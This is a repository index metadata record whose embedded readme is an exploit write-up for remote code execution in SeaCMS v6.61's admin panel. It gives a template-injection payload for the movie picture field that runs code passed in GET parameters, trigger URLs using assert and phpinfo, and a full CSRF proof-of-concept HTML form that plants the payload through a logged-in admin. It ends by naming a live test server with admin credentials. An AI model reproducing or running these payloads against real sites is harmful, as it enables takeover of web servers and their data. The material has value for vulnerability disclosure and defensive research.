{"id":18818942,"url":"https://github.com/imagemlt/seacms","last_synced_at":"2026-01-27T10:35:08.145Z","repository":{"id":201349648,"uuid":"141405073","full_name":"imagemlt/Seacms","owner":"imagemlt","description":"exp","archived":false,"fork":false,"pushed_at":"2018-07-18T08:33:21.000Z","size":1,"stargazers_count":2,"open_issues_count":0,"forks_count":0,"subscribers_count":0,"default_branch":"master","last_synced_at":"2025-05-22T07:55:32.459Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"HTML","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/imagemlt.png","metadata":{"files":{"readme":"readme.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null}},"created_at":"2018-07-18T08:29:17.000Z","updated_at":"2018-07-20T11:57:17.000Z","dependencies_parsed_at":null,"dependency_job_id":"c839d287-5ac6-4ea7-bd27-234b4c048f88","html_url":"https://github.com/imagemlt/Seacms","commit_stats":null,"previous_names":["imagemlt/seacms"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/imagemlt/Seacms","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/imagemlt%2FSeacms","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/imagemlt%2FSeacms/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/imagemlt%2FSeacms/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/imagemlt%2FSeacms/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/imagemlt","download_url":"https://codeload.github.com/imagemlt/Seacms/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/imagemlt%2FSeacms/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":28812117,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-01-27T07:41:26.337Z","status":"ssl_error","status_checked_at":"2026-01-27T07:41:08.776Z","response_time":168,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.6:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-11-08T00:19:33.422Z","updated_at":"2026-01-27T10:35:08.129Z","avatar_url":"https://github.com/imagemlt.png","language":"HTML","funding_links":[],"categories":[],"sub_categories":[],"readme":"# backend RCE in the latest version of SeaCMS(v6.61)\n\nIn SeaCMS's admin platform, just in the page of publishing movies,due to the low limitation of the code injected in the picture's url,we can execute random code to getshell.though there are some way's in the /include/main.class to limit the usage of the code,we can find ways to bypass it.\nSo How does this vul be triggerd? here are some Steps:  \n* Firstly login to the admin panel, in this case the admin directory is adjusted to `/backend`.\n![](http://p7lc13qga.bkt.clouddn.com/backend.PNG)\n* Secondly add a movie and set it's pictrue address as `{if:1)$GLOBALS['_G'.'ET'][a]($GLOBALS['_G'.'ET'][b]);//}{end if}` \n![](http://p7lc13qga.bkt.clouddn.com/add.png)\n* After adding it visit `/details/index.php?1.html\u0026m=admin\u0026a=assert\u0026b=phpinfo();`you can find `phpinfo()` is executed.\nhere 1.html refers to the id of the video you have just added.In my case, the video's id is 2 so I executed as 2.html.\n![](http://p7lc13qga.bkt.clouddn.com/vul.PNG)\n* Or you can just visit `/search.php?searchtype=5\u0026tid=0\u0026a=assert\u0026b=phpinfo();`or any other places that display the video's pic you have just added.\n\n\nAlso in the adding movie page it has no csrf protection so we can use CSRF to attacked it.  \ncsrf poc is here:\n```html\n\u003chtml\u003e\n  \u003c!-- CSRF PoC - generated by Burp Suite Professional --\u003e\n  \u003cbody\u003e\n  \u003cscript\u003ehistory.pushState('', '', '/')\u003c/script\u003e\n  \u003c!-- adjust action to your url --\u003e\n    \u003cform action=\"http://127.0.0.1/seacms/backend/admin_video.php?action=save\u0026acttype=add\" method=\"POST\"\u003e\n      \u003cinput type=\"hidden\" name=\"v\u0026#95;commend\" value=\"0\" /\u003e\n      \u003cinput type=\"hidden\" name=\"v\u0026#95;name\" value=\"getshell\" /\u003e\n      \u003cinput type=\"hidden\" name=\"v\u0026#95;enname\" value=\"ceshi\" /\u003e\n      \u003cinput type=\"hidden\" name=\"v\u0026#95;color\" value=\"\u0026#35;FF0000\" /\u003e\n      \u003cinput type=\"hidden\" name=\"v\u0026#95;type\" value=\"5\" /\u003e\n      \u003cinput type=\"hidden\" name=\"v\u0026#95;state\" value=\"5\" /\u003e\n      \u003cinput type=\"hidden\" name=\"v\u0026#95;pic\" value=\"{if:1)$GLOBALS['_G'.'ET'][a]($GLOBALS['_G'.'ET'][b]);//}{end if}\" /\u003e\n      \u003cinput type=\"hidden\" name=\"v\u0026#95;spic\" value=\"\" /\u003e\n      \u003cinput type=\"hidden\" name=\"v\u0026#95;gpic\" value=\"\" /\u003e\n      \u003cinput type=\"hidden\" name=\"v\u0026#95;actor\" value=\"\" /\u003e\n      \u003cinput type=\"hidden\" name=\"v\u0026#95;director\" value=\"\" /\u003e\n      \u003cinput type=\"hidden\" name=\"v\u0026#95;commend\" value=\"0\" /\u003e\n      \u003cinput type=\"hidden\" name=\"v\u0026#95;note\" value=\"\" /\u003e\n      \u003cinput type=\"hidden\" name=\"v\u0026#95;tags\" value=\"\" /\u003e\n      \u003cinput type=\"hidden\" name=\"select3\" value=\"\" /\u003e\n      \u003cinput type=\"hidden\" name=\"v\u0026#95;publishyear\" value=\"\" /\u003e\n      \u003cinput type=\"hidden\" name=\"select2\" value=\"\" /\u003e\n      \u003cinput type=\"hidden\" name=\"v\u0026#95;lang\" value=\"\" /\u003e\n      \u003cinput type=\"hidden\" name=\"select1\" value=\"\" /\u003e\n      \u003cinput type=\"hidden\" name=\"v\u0026#95;publisharea\" value=\"\" /\u003e\n      \u003cinput type=\"hidden\" name=\"select4\" value=\"\" /\u003e\n      \u003cinput type=\"hidden\" name=\"v\u0026#95;ver\" value=\"\" /\u003e\n      \u003cinput type=\"hidden\" name=\"v\u0026#95;hit\" value=\"0\" /\u003e\n      \u003cinput type=\"hidden\" name=\"v\u0026#95;monthhit\" value=\"0\" /\u003e\n      \u003cinput type=\"hidden\" name=\"v\u0026#95;weekhit\" value=\"0\" /\u003e\n      \u003cinput type=\"hidden\" name=\"v\u0026#95;dayhit\" value=\"0\" /\u003e\n      \u003cinput type=\"hidden\" name=\"v\u0026#95;len\" value=\"\" /\u003e\n      \u003cinput type=\"hidden\" name=\"v\u0026#95;total\" value=\"\" /\u003e\n      \u003cinput type=\"hidden\" name=\"v\u0026#95;nickname\" value=\"\" /\u003e\n      \u003cinput type=\"hidden\" name=\"v\u0026#95;company\" value=\"\" /\u003e\n      \u003cinput type=\"hidden\" name=\"v\u0026#95;tvs\" value=\"\" /\u003e\n      \u003cinput type=\"hidden\" name=\"v\u0026#95;douban\" value=\"\" /\u003e\n      \u003cinput type=\"hidden\" name=\"v\u0026#95;mtime\" value=\"\" /\u003e\n      \u003cinput type=\"hidden\" name=\"v\u0026#95;imdb\" value=\"\" /\u003e\n      \u003cinput type=\"hidden\" name=\"v\u0026#95;score\" value=\"\" /\u003e\n      \u003cinput type=\"hidden\" name=\"v\u0026#95;scorenum\" value=\"\" /\u003e\n      \u003cinput type=\"hidden\" name=\"v\u0026#95;longtxt\" value=\"\" /\u003e\n      \u003cinput type=\"hidden\" name=\"v\u0026#95;money\" value=\"0\" /\u003e\n      \u003cinput type=\"hidden\" name=\"v\u0026#95;psd\" value=\"\" /\u003e\n      \u003cinput type=\"hidden\" name=\"v\u0026#95;playfrom\u0026#91;1\u0026#93;\" value=\"\" /\u003e\n      \u003cinput type=\"hidden\" name=\"v\u0026#95;playurl\u0026#91;1\u0026#93;\" value=\"\" /\u003e\n      \u003cinput type=\"hidden\" name=\"m\u0026#95;downfrom\u0026#91;1\u0026#93;\" value=\"\" /\u003e\n      \u003cinput type=\"hidden\" name=\"m\u0026#95;downurl\u0026#91;1\u0026#93;\" value=\"\" /\u003e\n      \u003cinput type=\"hidden\" name=\"v\u0026#95;content\" value=\"\" /\u003e\n      \u003cinput type=\"hidden\" name=\"Submit\" value=\"�\u0026#161;\u0026#174;�\u0026#174;\u0026#154;�\u0026#143;\u0026#144;浜\u0026#164;\" /\u003e\n      \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n    \u003c/form\u003e\n  \u003c/body\u003e\n\u003c/html\u003e\n\n```\n\nyou can test this vul at `http://111.230.11.248:10089/backend/`,and the username and password is admin|admin.","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fimagemlt%2Fseacms","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fimagemlt%2Fseacms","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fimagemlt%2Fseacms/lists"}